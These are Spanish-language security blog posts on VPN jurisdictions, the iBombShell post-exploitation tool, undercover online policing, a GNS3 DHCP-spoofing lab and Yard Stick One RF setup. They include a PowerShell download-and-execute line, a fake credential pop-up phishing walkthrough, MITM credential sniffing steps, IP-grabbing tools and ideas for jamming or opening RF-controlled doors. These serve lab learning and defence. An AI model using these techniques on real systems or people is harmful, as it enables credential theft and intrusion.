Quantcast
Channel: THE HACKING DAY BLOG
Viewing all 217 articles
Browse latest View live

¿QUÉ SON LOS 14 EYES? - RECOMENDACIONES PARA EL USO DE VPN

$
0
0

La razón por la cual usamos redes privadas virtuales (VPN) es porque protegen nuestra privacidad en línea, sin embargo, la privacidad es esencialmente inexistente si se vive en un lugar donde el gobierno puede hacer un seguimiento de sus actividades en línea. Esta es la razón por la que es necesario usar una buena VPN, el objetivo es no tener que preocuparse por los terceros que le vigilan . Sin embargo, mientras usa una VPN, es importante saber si dicha empresa está en un país perteneciente a los 14 Eyes. - Ahora, dicho esto, probablemente se pregunten, Qué es o cuales son los países que hacen parte de los 14 Eyes .

Antes de decidir utilizar una VPN , es importante tener una buena cantidad de información básica sobre la compañía. En términos de los 14 Eyes Countries, todos han firmado el Acuerdo UKUSA que básicamente permite a los países compartir información sobre comunicaciones internacionales entre dos partes. Obviamente, esto es algo que molestaría a los usuarios de VPN porque, ¿por qué debería permitirse que alguien acceda a sus actividades en línea, especialmente cuando no implica nada ilegal, como terrorismo o contenido explícito relacionado con niños o animales?

¿Cómo se utiliza el Acuerdo UKUSA?


En los Estados Unidos, es "ilegal" que el gobierno espíe a sus ciudadanos. Tiene que haber órdenes judiciales y muchos otros procedimientos legales para que el gobierno pueda vigilar a sus ciudadanos. El Reino Unido, por ejemplo, no tiene ninguna de las mismas limitaciones que tiene Estados Unidos en la vigilancia del mismo ciudadano estadounidense. Esto podría permitir a los Estados Unidos en virtud del Acuerdo UKUSA dar un codazo a las autoridades del Reino Unido para que observen a diferentes personas y vean exactamente lo que están haciendo.

Naturalmente, hay ciertos derechos que tienen las personas en diferentes países que protegen su privacidad , pero en el mundo de las comunicaciones en línea, las decisiones legales en estas áreas son, en el mejor de los casos, turbias. Debido a que existe un precedente legal en evolución, es difícil para los usuarios saber exactamente dónde comienzan y terminan sus derechos de privacidad en las comunicaciones en línea. Es por eso que muchos recurren a las VPN, ya que una VPN confiable no rastrea lo que haces en línea.

¿Qué son los 14 Eyes Countries?


14 Ojos se refieren a los países que han firmado el Acuerdo UKUSA. Obviamente, el Reino Unido y los Estados Unidos son parte de los 14 países. Los otros doce son:

Italia
Canadá,
Australia
Dinamarca
Francia
Países Bajos
Noruega
Alemania
Bélgica
Suecia
España
Nueva Zelanda


Además, otros países que se cree que son parte de los 14 Ojos, pero no oficialmente son Israel y Japón. Después de la fuga de Snowden , se confirmó que Singapur y Corea del Sur también están participando en el acuerdo.

¿Por qué deberías evitar una VPN en un país de 14 ojos?


Muchos países, especialmente los Estados Unidos, pueden obtener su historial de Internet y, lo que es peor, pueden hacerlo sin notificárselo. La VPN que se encuentra en un país de 14 Ojos está sujeta a leyes que esencialmente permiten que el sistema legal obligue a la entidad privada (una VPN) a entregar información sobre los hábitos de la web de un usuario.

Además, las VPN en estos países se ven obligadas a mantener registros de todo lo que hace una persona en internet. Por lo tanto, si va a utilizar una VPN, es extremadamente inteligente obtener una VPN que no esté basada en ninguno de los países pertenecientes a los 14 Eyes, y desconfiar de cualquier VPN con sede en Singapur, Corea del Sur, Israel y Japón.

¿Cómo puedo saber dónde se encuentra una VPN?


En realidad, no es demasiado difícil descubrir qué VPN no están basadas en los países de los 14 Eyes. La forma más fácil de averiguarlo es hacer una búsqueda en Google, pero cuando vea la página de destino de una VPN, notará que la dirección en la parte inferior probablemente le dirá en qué se basa. Si aún no está seguro, mire la información de facturación.

Algunos países en los que puedes encontrar grandes VPN son Hong Kong, Taiwán y varias naciones de Europa del Este que forman parte de la UE y la OTAN. Estos países le permiten tener la habilidad técnica de uno de los 14 países de Eyes sin tener que lidiar con los diferentes problemas que afectan al uso de VPN, como la falta de privacidad.

Seleccionando un buen VPN


La clave para seleccionar una buena VPN es entender primero el propósito. Existen diferentes VPN para juegos y otras que son excelentes para streaming. Sin embargo, cuando se mira en general a una VPN, la clave es tener algunas características realmente sólidas. Comprenda que tendrá que pagar por una VPN, pero lo que ofrecen hace que valga la pena.

La primera característica a buscar es una gran cantidad de servidores. Esto le permitirá seleccionar el servidor más cercano a usted. Un servidor cercano permite una mejor conexión, especialmente en términos de juegos. Otro factor importante es que la VPN no rastrea sus datos. Esta es la razón por la que mucha gente confía en las VPN, y cuando tienes una VPN de un lugar que no forma parte de los 14 Eyes, entonces tienes una VPN en la que puedes confiar.

Conclusión
Desafortunadamente, los gobiernos siempre intentarán saber lo que usted hace en la privacidad de su hogar. Mientras busca una VPN que no está basada en uno de los 14 Eyes, asegúrese de que su VPN no esté realizando un seguimiento de su información.


FUENTE: www.hackread.com

Pop-Up phishing con iBombShell

$
0
0

iBombShell Es una herramienta escrita en PowerShell que permite a un usuario disponer de un prompt o una shell con funcionalidades de post-explotación, en cualquier instante y sistema operativo. Además, también permite ejecutar funcionalidades de explotación de vulnerabilidades en algunos casos. Estas funcionalidades son cargadas dinámicamente, en función de cuando se necesiten, a través de un repositorio de Github. La shell es descargada directamente a memoria proporcionando acceso a un gran número de características y funcionalidades de pentesting, las cuales serían descargadas directamente a memoria sobre el sistema, sin ser almacenado en disco.

Lasfuncionalidades descargadas directamente a memoria lo hacen en un formato de función de PowerShell. Esta vía de ejecución es conocida como EveryWhere. Además, iBombShell proporciona una segunda forma de ejecución llamada Silently. Con esta manera de ejecución se puede lanzar una instancia de iBombShell, llamada warrior. Cuando el warrior es ejecutado sobre una máquina comprometida, éste se conectará a un C2 a través de protocolo HTTP. Desde el C2, el cual está escrito en Python, se puede controlar el warrior para poder cargar funciones a memoria dinámicamente y ofrecer la ejecución remota de funcionalidades de pentesting.

El objetivo de este post es aprender a utilizar la herramienta iBombshell desde un sistema Windows y generar un Pop-up Pgishing que nos solicite las credenciales del equipo.

IBombshell puede ser de gran ayuda para realizar pruebas de Pentesting en caso de que no contemos con ninguna otra herramienta ya que solo necesitamos una consola de Powershell.

1) Desde nuestra maquina Windows, abrir una consola de Powershell:

Lo podemos hacer escribiendo “powershell” en el icono de búsqueda de nuestra barra de tareas o ejecutando la combinación de teclas “Windows + R” y escribiendo “powershell” en nuestra ventana
de ejecutar.



2) Una vez tengamos nuestra consola de Powershell en marcha, procedemos a invocar a iBombshell desde Github con el siguiente comando:

“iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)”



3) Para cargar nuestra herramienta, escribimos el comando “console” y aparecerá el banner de iBombshell:



Como se muestra en el enunciado, con el comando “showcommands” podremos ver los comandos y módulos disponibles en la herramienta.



4) En este laboratorio nos centraremos en el módulo “phishing/getcredential” con el cual se genera un Pop-up solicitándonos las credenciales de acceso del equipo.

Primero escribimos el comando “phishing/getcredential” para cargar el módulo y seguido a esto escribimos “showfunctions” para ver las funciones disponibles.



Por ultimo tecleamos el siguiente comando “getcredentials” y nos solicitarán una serie de parámetros para personalizar nuestro Pop-up.



Y por último aparecerá el Pop-up y una vez la victima ingrese las credenciales, nos aparecerán en la consola.





Eso fue todo por este post, espero que sea de utilidad y que sigan profundizando en el uso de esta brutal herramienta.

@XzupaX
@TheHackingDay

Una metodología de agencia encubierta virtual

$
0
0

Cuando hablamos de agencia encubierta virtual pareciera que se tratara de ciencia ficción, sin embargo la realidad a la que se enfrentan los órganos investigativos llevan a que sea necesario explorar técnicas especializadas para poder combatir los delitos cibernéticos.

En la actualidad es indudable que los instrumentos penales y las técnicas de investigación tradicionales son insuficientes para hacer frente a la delincuencia organizada, ya que sus dimensiones y efectos han propiciado la aparición de nuevas respuesta en el orden penal, en el plano procesal, y en el marco de la cooperación internacional. Si la tecnología avanza, las metodologías investigativas usadas por los investigadores cibernéticos deben cambiar, para poder enfrentar a las organizaciones criminales que cada día están afirmándose y ocultándose bajo las plataformas tecnológicas existentes. Es por esta razón que avoco a redactar este artículo, básicamente para mostrar una metodología que puede ser de utilidad, precisamente, en el marco de una agencia encubierta virtual y que resulta como una opción para contrarrestar la criminalidad organizada que opera en la red.

En principio debemos decir, que para iniciar una actividad investigativa como la que acá se propone, se deben coordinar actividades conforme al código de procedimiento penal y lo reglado la Ley 1908 de 2018, la cual dio más herramientas a los investigadores que se dedican a combatir la delincuencia organizada.

La figura del agente encubierto virtual solo podrá ser utilizada cuando los investigadores asignados al caso, soliciten a través de los informes de investigador de campo la imlementación de la técnica investigativa, aportando los elementos materiales de prueba de los que se evidencien los indicios que soporten la necesidad, la proporcionalidad y razonabilidad de la técnica. El mencionado informe será el que se utilizará por parte del fiscal del caso para que se imparta una autorización de un Juez de control de garantias constitucionales, toda vez que, siempre que se vaya a ingresar a canales cerrados, grupos especificos en la red o en aquellos en los que se maneje información sensible o que manejen datos privados la norma procesal así lo exige.

Una vez hecho lo anterior, previa sustentación del fiscal que recibió el informe, el Juez validará los motivos fundados, las investigaciones de grupos o perfiles privados a los que se va a acceder como agente encubierto y verificará la garantía de confiabilidad de las herramientas electrónicas con las que se realizará la técnica investigativa, impartiendo autorización para realizar el procedimiento investigativo.

Iniciada la actividad investigativa, se busca que exista una aceptación de los policías judiciales por parte de quienes están siendo investigados puede ser ejemplo el hechos de compartir información en las redes sociales o grupos de conversación en la red sin que se evidencie actividades propias de un agente provocador o instigador de delitos, pues esto esta prohibido en nuestro ordenamiento jurídico. Por esto, lo que se busca es que el policia judicial virtual, se haga pasar por un usuario más de la red, contactando a los indiciados sin que esto provoque la comision de delitos.

Téngase en cuenta que las actividades de agente cubierto virtual que se realizan en zonas públicas en las redes sociales, chats entre otras tantas, no se necesita una autorización de un juez por que las investigaciones en fuentes abiertas cuando el contenido es público no es necesario la autorización judicial para actuar como agente cubierto virtual, pues son labores de patrullaje virtual que nada tienen que ver con la técnica que se expone.

Volviendo con el ejemplo, debemos decir que teniendo en cuenta la actividad que se viene presentado en las redes sociales, WhatsApp, Twitter, etc. Es complejo la identificación de las personas ya que en un porcentaje muy alto, éstas actividades ilícitas se mantienen ocultas en estos medios tecnológicos y por lo tanto, para los investigadores se les complica descubrir a los delincuentes informáticos, para esto entoces enunciaremos algunas de las herramientas free que se pueden utilizar para el desarrollo de la figura del agente encubierto virtual, que sirven para geolocalizar a los individuos y obtener las IP desde donde se desarrolla la actividad ilícita:

  • plogger. como obtener la IP de un dispositivo
  • Grabify. Como obtener la IP de un dispositivo
  • Whoreadme. Como obtener la IP de un dispositivo enviado un email
  • Obtener IP mediante el envió de email con contenido oculto
  • Whaststheirip.com
También es importante que los policias judiciales que ejercerán como agentes encubierto virtual se les recomienda ocultar su verdadera identidad, utilizando un avatar. La legislación Colombiana es enfática en permitir la creación de una identidad para quien se convierte en agente encubierto, máxime cuando en internet los ciberdelincuentes ocultan su identidad, por lo que uno de los pasos fundamentales, una vez se sepa que herramientas tecnológicas van a ser usadas, el investigador –agente encubierto- debe estar en la capacidad de ocultar su identidad para evitar el riesgo que se deriva de esta actividad.

Estos procedimientos utilizados para identificar personas en las redes sociales y todas las plataformas digitales que tenemos en internet, que son utilizadas para ocultasen en la internet. son complejas estas investigaciones por el anonimato de la misma que utiliza para cometer delitos especialmente con menores de edad como son la pornografía infantil. Se está aprovechando un recurso tecnológico que nos ofrece la red para adelantar las investigaciones que se vienen realizando en el interior del grupo de Delitos Informáticos de la Seccional Valle, que son aplicativos totalmente gratis.

Impulsar una actuación eficaz, dinámica y decidida por la Fiscalia General de la Nación ante el crecimiento exponencial de la ciberdelincuencia mediante la unificación de criterios y una adecuada coordinación en las investigaciones.

Una vez concluida la actividad investigativa, se deben seguir las reglas de los registros y allanamientos para hacer el control posterior ante Juez de control de garantías para que la información y el procedimiento quede legalizado en debida forma.

Autor: Juan Carlos Valencia González (THD-EPC)

LABORATORIOS DE SEGURIDAD CON GNS3 2/2 - DHCP SPOOFING

$
0
0
Saludos Amigos

En nuestra primera entrega, hablamos de una herramienta llamada GNS3 el cual nos permitía construir un laboratorio completo sobre interconexión de Redes LAN/WAN

Ahora les comparto el articulo entregado por uno de nuestros alumnos certificados THD-EPC (Ethical Pentester Certified). sobre un laboratorio practico del funcionamiento del DHCP SPOOFING.




DHCP SPOOFING

A diario escuchamos de empresas que sufren ataques de hacking perpetrados por una persona que se encuentran al otro lado del mundo y que posee conocimientos profundos en cuanto a técnicas y herramientas de penetración a sistemas informáticos. Debido a esto, las empresas invierten sus recursos y dirigen sus esfuerzos en blindar sus accesos exteriores usando todo tipo de dispositivos y software que el mercado pueda ofrecer (Firewall, IPS, WAF, Antivirus, Anti DDoS y otros).

Pero muy poco escuchamos de los ataques internos que pueden ser llevados a cabo por su mismo personal o un ocasional visitante. En toda red LAN generalmente lo que se busca es que esta funcione y haga su trabajo (transportar DATOS). Muy pocos administradores, se dan a la tarea de conocer e implementar medidas de seguridad, que mitiguen ataques que existen desde hace mucho tiempo, y que todavía hoy pueden ser llevados a cabo muy fácilmente.

Es justamente la facilidad y la vigencia de uno de estos ataques (DHCP Spoofing) que pretendo demostrar en este artículo.

1. El protocolo DHCP

Todo dispositivo que quiera comunicarse dentro de una red TCP/IP debe de contar con ciertos parámetros básicos en cuanto a direccionamiento de capa 3 que le permitirá comunicarse dentro del segmento o fuera del mismo. 

Estos parámetros son:

  1. Una dirección IP
  2. Una máscara de red
  3. Una dirección IP de una puerta de enlace
  4. Una dirección IP de un servidor DNS

El protocolo DHCP es uno de los más usados en todo tipo de redes desde pequeñas, medianas y más aún grandes. Permite que a través de un servidor se pueda gestionar de manera automática la asignación de direcciones IP’s dentro de una red LAN.

Figura 1 - Mensajes del Protocolo DHCP

El funcionamiento del protocolo es muy sencillo como se ve en la imagen anterior:

  1. El cliente mediante un mensaje DISCOVERY de Broadcast solicita una IP a algún servidor DHCP que se pueda encontrar en su red LAN
  2. El servidor o los servidores, que se encuentran en el mismo segmento de red, devolverán un mensaje OFFER Unicast, ofreciendo una IP de un pool de direcciones que gestionan, para que el cliente pueda usarla. 
  3. Seguidamente, el cliente responderá a la oferta con un mensaje REQUEST Broadcast, confirmando que acepta la oferta y pretende usar esa dirección.
  4. Finalmente el servidor registrará la asignación de la IP ofertada al cliente, y enviara un mensaje de ACK Unicast indicando que el proceso se ha completado de forma correcta.

2. El ATAQUE 

Las herramientas utilizadas para armar el escenario simulado del ataque son: 
  • GNS3 con VM. 
  • VMWare Workstation. 
  • 2 Máquinas virtuales con Windows 10 (VICTIMA y USUARIO NORMAL). 
  • 1 Máquina virtual con Kali Linux (ATACANTE). 
  • 1 Router Cisco emulado modelo 3750 IOS 12 (SERVIDOR DHCP LEGAL). 
  • 1 SwitchMultilayer Cisco emulado con IOSv 15. 
  • Yersinia instalado en la máquina de Kali Linux para el DHCP Starvation. 
  • Metasploit instalado en la máquina de Kali Linux para el DHCP Rogue. 
  • Wireshark instalado en la máquina de Kali para visualizar el tráfico de la víctima. 

La topología del ataque es el que se muestra en la siguiente imagen:


Figura 2 - Escenario Virtualizado Armado con GNS3

El ROUTERCisco R1 es el servidor DHCP legal y también hace el rol de puerta de enlace además de tener la conexión a INTERNET. La configuración del servidor DHCP en el router es la siguiente:

Extracto de la configuración Cisco R1, puede descargar AQUI

El ATACANTE es un usuario que está dentro de la red LAN y ha recibido los parámetros de direccionamiento IP a través del servidor DHCP. (Es una Maquina en Kali Linux)

Figura 3: Interfaz de red eth0 recibiendo IP a través de DHCP

El SWITCH CiscoIOSvL215-1 que está conectado a todos los equipos (Router, Atacante, Victima y Usuario normal) esta con la configuración por defecto en todos sus puertos y no cuenta con ningún tipo de configuración adicional. En otras palabras se lo energizo y se conectaron los hosts. (La configuración completa del switch CiscoIOSvL215-1 puede descargarse de AQUI.

El USUARIO NORMAL es otro usuario además de nosotros que está recibiendo los parámetros de direccionamiento IP a través del servidor DHCP legal que se encuentra configurado en el router CISCO.

Figura 4: Usuario normal recibiendo DHCP del servidor legal

La VICTIMA antes de que se lleve a cabo el ataque, tiene la PC apagada. Vamos a asumir que una vez que el ataque se lleve a cabo, la victima encenderá el equipo y entrará en acción.

El ataque consta de 4 fases:

Fase Previa: Preparación del DCHP Rogue

En esta fase previa, antes de llevar a cabo el ataque, se hace la configuración de una interfaz de red virtual en la máquina del atacante, y se hace la configuración de los parámetros del servidor DHCP falso en el equipo del ATACANTE

Creamos la interfaz virtual eth0:1 y le asignamos la dirección IP 172.16.10.254 que posteriormente será usada como puerta de enlace para la VICTIMA.

Figura 5: Creación y asignación de IP a la interfaz virtual eth0:1

Habilitamos el reenvió en la máquina del ATACANTE, esto con el fin de que cuando recibamos el tráfico de la VICTIMA podamos re dirigirlo hacia la puerta de enlace real. Además agregamos una ruta en la máquina del ATACANTE que apunte a la puerta de enlace legal que en este caso es el router Cisco.


Figura 6: Habilitación de ip_forward y ruta para reenvió del tráfico


Configuramos los parámetros en el servidor DHCP falso. Para esto vamos a usar Metasploit que nos permite configurar y correr un DHCP Rogue.

 Figura 7: Iniciación del metasploit y habilitación del módulo de DHCP


Figura 8: Configuración de los parámetros del módulo de DHCP en Metasploit

Fase I: DCHP Starvation

En esta primera parte del ataque se busca agotar el pool de direcciones que tiene el servidor DHCP legal, que en este caso es el router Cisco. Esto con el fin de levantar un servidor DHCP falso y que cuando la víctima solicite direccionamiento IP, nuestro servidor DHCP falso sea el único que responda. 

Iniciamos YERSINIA, con el fin de realizar el ataque de DHCP Starvation y agotar todas las IPs del pool de direcciones que tiene el Router Cisco. 

Figura 9: IP’s asignadas por el servidor DHCP legal antes del ataque (router Cisco)

Figura 10: Iniciando el Ataque DHCP Starvation usando YERSENIA

 Figura 11: Ataque DHCP Starvation con YERSINIA en ejecución


Figura 12: Tabla de direcciones IP’s asignadas en el servidor DHCP legal después del ataque

Fase II: DHCP Rogue

En esta segunda parte del ataque, se levanta el servidor DHCP falso en el equipo del atacante, para que responda a las solicitudes de direccionamiento de las víctimas. Esto con el fin principal, de poner al equipo del atacante como puerta de enlace, para que todo el tráfico de la víctima pase a través de este cuando se dirija hacia un segmento de red externo como pudiera ser INTERNET. 

Levantamos el servidor DHCP falso que tenemos configurado en Metasploit

Figura 13: Iniciación del servidor DHCP falso en Metasploit

Encendemos la máquina de la víctima para que se una a la red LAN y solicite dirección IP a través de DHCP.

Figura 14: Direccionamiento IP de la maquina victima recibido del servidor DHCP falso

Fase III: Robo de credenciales MITM

En esta última parte del ataque, simplemente se revisa todo el tráfico de la víctima, que va pasando a través del equipo del atacante, con un sniffer. El objetivo de esto podría ser localizar credenciales de acceso a páginas web, solo por poner un ejemplo.

Hasta este punto la victima ya tiene direccionamiento, que dirige su tráfico hacía la máquina del ATACANTE. Posteriormente, el ATACANTE solo necesitará levantar un sniffer, como WIRESHARK, para poder visualizar todo el tráfico de la víctima, que este dirigido hacia otros segmentos de red como por ejemplo INTERNET.

Figura 15: Iniciación del sniffer WIRESHARK

Desde la máquina de la víctima abrimos un navegador, y accedemos a un sitio HTTP de prueba, que nos permite autenticarnos, usando nuestras credenciales. Todo esto podrá ser visto por el ATACANTE que finalmente obtendrá nuestras credenciales.

Figura 16: Sitio HTTP de login para probar el robo de credenciales

Figura 17: Credenciales encontradas a través de WIRESHARK


3. CONTRAMEDIDA

Después de la demostración realizada, creo que nos queda claro lo fácil y peligroso que puede ser este tipo de ataques. Entonces la pregunta que todos nos hacemos es, cómo evito este tipo de ataques, que contramedidas puedo encontrar disponibles. 

Pues una buena noticia es que si existe una contramedida, y se denomina DHCP Snooping. La demostración de cómo se configura y cómo funciona la haremos para la marca CISCO pero las demás marcas también cuentan con este tipo de contramedida.

Figura 18: Topología de red donde se tiene aplicado DHCP Snooping


La idea detrás de esta contramedida es, definir PUERTOS CONFIABLES (trusted ports) y PUERTOS NO CONFIABLES (untrusted ports)

Los puertos en el switch que estén conectados a los servidores DHCP legales deberán ser configurados como TRUSTED y el resto de los puertos como UNTRUSTED. De esta manera cuando un atacante conectado a un puerto UNTRUSTED pretenda responder a solicitudes de DHCP DISCOVER haciéndose pasar por un servidor DHCP el puerto inmediatamente será BLOQUEADO

También para el tema del DHCP Starvation se maneja una tabla conocida como DHPCP Snooping Binding Table que contiene el puerto, la dirección MAC y la IP asignada por el servidor DHCP legal. Con esta información el switch será capaz de detener un ataque de DHCP Starvation

Configuración de DHCP Snooping en nuestro Switch

Figura 19: Configuración básica de DHCP Snooping

4. RECOMENDACIONES

DHCP Spoofing es solo uno de los muchos ataques internos (MAC Flooding, DNS Spoofing, ARP Spoofing, VLAN Hopping, STP Attack y otros) que pueden ser realizados dentro de una LAN, es por eso que es importante conocer todos estos ataques y sus respectivas contramedidas. 

Lo ideal sería que se cuente con una plantilla de HARDENING que pueda ser adecuada a las diferentes topologías con las que se cuenten. 

Se deben contar con políticas que definan procesos de cómo se debe configurar un dispositivo de red nuevo.

5. CONCLUSIÓN 

Finalmente, podemos concluir indicando que la mayor parte de los ataques perpetrados en las organizaciones son de tipo interno. Para llevarlos a cabo, no es necesario contar con conocimientos avanzados de hacking, ya que hoy en día existe una vasta cantidad de herramientas que automatizan las tareas que antes requerían conocimientos bastante técnicos. 

De igual manera se cuenta con la información necesaria en INTERNET, donde el atacante solo debe realizar una búsqueda sencilla y encontrara un sinfín de fuentes que lo guiaran paso a paso sobre cómo llevar a cabo un ataque con éxito. 

Tomar conciencia de todo esto es clave para no sufrir ataques de este tipo y mucho más si nosotros somos los encargados de que esto no suceda.

6. FUENTES

Definición y funcionamiento de un Servidor DHCP
http://www.ite.educacion.es/formacion/materiales/85/cd/linux/m2/servidor_dhcp.htm

Ataque DHCP Spoofing usando Metasploit
http://svuit.vn/threads/lab-2-rogue-dhcp-server-with-flood-dhcp-and-rogue-routing-1251/

Ataque DHCP Spoofing usando Yersinia
https://www.youtube.com/watch?v=hfqy2ib-t44&list=PL2A7l6PiV52d-79P90Gx7IF807cQzwKdj

DHCP Snooping
https://packetpushers.net/ccnp-studies-configuring-dhcp-snooping/



Autor: Jorge Aduviri - (Ethical Pentester Certified)


NOTAS FINALES POR @jcaitf

Tal como menciona nuestro amigo Jorge, la mayor parte de los ataques provienen desde la LAN, el anterior articulo muestra de una manera muy practica como se capturan las credenciales que viajan por protocolo HTTP, sin embargo recuerden que existen técnicas que permiten también hacerlo sobre HTTPS o HSTS, como puede ser el caso de SSLSTRIP+, SSLSPLIT, entre otros.

Es lógico que ademas de controlar estos posibles ataques a través del switche, es importante tener en cuenta el cifrado de las comunicaciones que permiten en caso de captura de trafico evitar la fuga de información.  Asegurar los equipos de comunicación de datos así como los servidores y estaciones de trabajo, no sobra a la hora de hablar de seguridad.







YARD STICK ONE - PRIMEROS PASOS

$
0
0


Algunas veces hemos querido jugar con las frecuencias que existen en el ambiente, tal caso lo vimos en un articulo en el 2016 con el titulo: "HACKING RADIOCOMUNICACIONES CON DISPOSITIVO DE 8 DOLARES", pero mas allá de interceptarlas a veces es necesario manipularlas o irradiarlas de algún modo para denegar una acción.

Imagine estos dos ejemplos, donde los entes policiales podrían utilizar este tipo de tecnología. uno de ellos podría ser evitar que un sospechoso pueda abrir su vehículo con su control de desbloqueo, daría el tiempo suficiente para un arresto.  otro seria conociendo la frecuencia con la que se abre las puertas eléctricas, crear un rutina que permita abrir cualquier puerta eléctrica sin necesidad del control, lo que a los entes policiales beneficiaria con el factor sorpresa.

Pues bien, todo esto se puede lograr con un dispositivo conocido con el nombre YARD STICK ONE (YS1) .  Empezaremos con este primer articulo de los primeros pasos, hasta adentrarnos a la manipulación de esta interesante herramienta.




Yard Stick One

La herramienta Yard Stick One (Yet Another Radio Dongle) puede transmitir o recibir señales digitales inalámbricas a frecuencias inferiores a 1 GHz. 

Cuenta con frecuencias half-dúplex de transmisión y recepción, las bandas de frecuencias oficiales soportadas por el dispositivo son 300-348 MHz, 391-464 MHz y 782-928 MHz, además las bandas de frecuencias de funcionamiento no oficiales son 281-361 MHz, 378-481 MHz y 749-962 MHz.

Las modulaciones soportadas son modulación por desplazamiento de amplitud (Amplitud Shift-Keying, ASK), modulación binaria sencilla (On-Off keying, OOK), modulación por desplazamiento de frecuencia gausiana (Gaussian Frequency Shift Keying, GFSK), modulación por desplazamiento de frecuencia de dos símbolos (2- Frequency Shift-Keying, 2-FSK), modulación por desplazamiento de frecuencia de cuatro símbolos (4- Frequency Shift-Keying, 4-FSK), velocidades de datos de hasta 500 kbps.

Adicionalmente, el Yard Stick One viene con firmware RfCat instalado. RfCat le permite controlar el transceptor inalámbrico desde un shell interactivo de Python o mediante scripts.

YARD Stick One también tiene instalado CC Bootloader, por lo que puede actualizar RFCat o instalar su propio firmware sin ningún hardware de programación adicional. 

Además, posee un conector SMA para antenas externas como la ANT500 o ANT700, receptor/amplificador para mejorar la sensibilidad de transmisión, amplificador para mayor potencia de salida, fuerte rendimiento de RF en todo el rango de frecuencia de funcionamiento, filtro de paso bajo para eliminación de armónicos cuando opera en las bandas de 800 y 900 MHz.




Puesta en Marcha

Lo que requieres para utilizar el Dispositivo (Dongle) es lo siguiente:

  • Yard Stick One
  • Una Antena tipo ANT500 o ANT700
  • Kali Linux con Actualizaciones al Día
  • Software rfcat

Sobre la maquina de Kali, instale la librería necesaria para que Python pueda manipular los dispositivos USB, para ello ejecute el comando:  "apt-get install python-usb"

Ahora en la maquina de Kali Linux, conectas el dispositivo que con plena seguridad lo va a reconocer, lo puedes comprobar con el comando lsusb o dmesg:


El siguiente paso es bajar el software RFCat de su sitio oficial, el RFCat USB Radio Dongle es capaz de transmitir, recibir, espiar, el espectro en frecuencias entre 300-928 MHz, lo que le da al usuario la capacidad de detectar o atacar cualquier protocolo de datos inalámbrico que transmita en esos rangos de frecuencia. Estos incluyen: sistemas de automatización del hogar, medidores inteligentes, sistemas SCADA, dispositivos "IOT", dispositivos móviles y muchos más. Proyecto creado por At1as.

En la carpeta "Download" del sitio oficial de RFCat, encontrara la ultima versión del archivo, para el momento de escribir este articulo es:


conociendo de antemano el archivo con extensión ".tgz", aplicamos los siguientes comandos desde la consola de Kali Linux:


  • wget https://bitbucket.org/atlas0fd00m/rfcat/downloads/rfcat_170508.tgz
  • tar zxvf rfcat_170508.tgz 
  • cd rfcat_170508 
  • python setup.py install 
  • rfcat -r
El último comando, siempre y cuando hayas conectado el dispositivo nos permitirá manipular el dongle.


Puedes ejecutar el comando d.ping(), para realizar una pequeña prueba (notaras una pequeña intermitencia en una de las luces del dispositivo).


Y por ultimo con el comando: print d.reprRadioConfig()  puedes mostrar la configuración del dispositivo y conocer datos como la versión del firmware, la configuración de frecuencia, configuración del módem, entre otros:


Actualización de Firmware

Creo importante para el lector conocer el método para actualizar los firmware de estos dispositivos, personalmente me gusta contar siempre con las ultimas versiones.  como se pudieron dar cuenta en la imagen anterior el Yard Stick One utilizado para el articulo, posee la revisión de firmware 0450.

Tenga en cuenta que el procedimiento explicado a continuación NO SE PUEDE REALIZAR EN LA MAQUINA DE KALI LINUX. la actualización del firmware desde Kali, hace que el dispositivo funcione mal y que algunos comandos de RFCat no se puedan ejecutar, como el caso de d.ping()

Recomiendo instalar una maquina Ubuntu (personalmente utilice la version 18.04-3 de 64 Bits) y que previamente instale los paquetes: make, cmake, python, python-pyserial, gcc y python-usb, tenga en cuenta que debe instalar el sdcc, pero recomiendo que utilice la version 3.5, la cual puede descargar de los siguientes sitios:

http://ftp.us.debian.org/debian/pool/main/s/sdcc/sdcc-libraries_3.5.0+dfsg-2_all.deb
http://ftp.us.debian.org/debian/pool/main/s/sdcc/sdcc_3.5.0+dfsg-2+b1_amd64.deb

Una vez lo descargue basta con instalar los paquetes con el comando "dpkg -i"

Desde la consola de Ubuntu, descargue todo el proyecto de RFCat del su sitio en GitHub, para ello ejecute los siguientes comandos:
  # cd rfcat

Para permitir el acceso no-root al YARD Stick One, deberá actualizar sus reglas de udev utilizando los siguientes comandos:

  # cp etc/udev/rules.d/20-rfcat.rules /etc/udev/rules.d
  # udevadm control --reload-rules


Con el comando "sudo python setup.py install" Instale nuevamente el RFCat en la maquina de Ubuntu.  Ahora inserte el dispositivo y ejecute el comando "rfcat -r", aparecerá el menú visto anteriormente, luego es necesario colocar el dispositivo en modo bootloader, para ello ejecute el comando: d.bootloader() dentro de rfcat.  Si todo esta bien, vera que en su Yard Stick One se encenderá 3 luces (Verde, Roja y Amarilla).  En caso que no le funcione, aplique el método explicado mas abajo.

Ahora en otra ventana cámbiese al sub directorio firmware de la carpeta de rfcat que descargo de GitHub, ejecute los siguientes comandos:

  # cd firmware 
  # make installRfCatYS1CCBootloader

Si todo sale bien, vera en la consola como se compila el firmware y como se carga en el dispositivo, una vez culmine notara que los leds se apagaran y podrá utilizar nuevamente el dongle en Kali Linux.

Ahora solo basta con ejecutar el comando print d.reprRadioConfig()  para verificar que el firmware efectivamente se actualizado de la version 0450 a la versión 0543.



Habilitar el BootLoader Cuando el Firmware no se esta Ejecutando

Es posible que pueda tener problemas con la actualización del Firmware y el dispositivo no quede cargando, por lo que es necesario habilitar nuevamente el BootLoader para inyectar otra versión de Firmware. 

Notara que el Dispositivo tiene 14 agujeros conocidos como PIN, con el siguiente esquema:


Solo debes hacer un puente con un Clip entre el Pin 7 y 9.





Por el momento es todo, en una próxima entrega explicare la forma de capturar y reproducir una señal. **HASTA PRONTO***

thdJca @jcaitf



SEGURIDAD EN REDES WIFI - PARTE 1/2

$
0
0




El contenido principal del presente artículo es sobre seguridad en redes wifi, es importante recalcar que no nos adentraremos al hacking ético, solo se hará algunas menciones, trataremos más el tema de seguridad. Se tratarán los conceptos necesarios sobre la tecnología Wireless, haciendo mención de historia, estándares, vulnerabilidades, buenas prácticas y herramientas de hacking y test de penetración.

INTRODUCCIÓN

